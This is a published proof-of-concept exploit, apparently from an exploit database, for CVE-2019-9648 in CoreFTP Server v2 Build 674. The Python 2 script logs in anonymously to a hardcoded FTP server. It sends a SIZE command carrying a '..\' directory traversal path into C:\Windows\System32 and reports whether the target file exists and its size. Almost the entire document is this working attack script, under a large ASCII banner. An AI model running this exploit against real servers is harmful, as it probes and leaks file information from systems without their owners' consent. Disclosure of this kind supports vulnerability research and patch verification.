# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
########################################################
###########Set Variables For Script Here################
file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"
########################################################
print ("""
##### # # ####### ##### ### # ##### ##### ##### # #####
# # # # # # # # # ## # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # # ###### ##### ###### ###### # # #####
# # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ##### ##### ##### ##### # #####
#######
# # # ##### # #### # #####
# # # # # # # # # #
##### ## # # # # # # #
# ## ##### # # # # #
# # # # # # # # #
####### # # # ###### #### # #
# # ###### # # #
# # # ##### # ##### ##### ###### # # # # # # ### # # ###### # # # # #
# # # # # # # # # ## # # # # # # # # # # # # ## #
# # # # # # # # ##### # # # ###### # ### ##### # # # # # #
# # # ##### # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # ## # # # ### # # # # # # # ##
## ## # # # # # ###### # # ###### # # # # ###### ## # # #
######
# # ## # # ##### ## # #
# # # # ## # # # # # # #
###### # # # # # # # # # # #
# # ###### # # # # # ###### # #
# # # # # ## # # # # # #
# # # # # # ##### # # ###### ######
""")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
s.send('QUIT\r\n')
s.close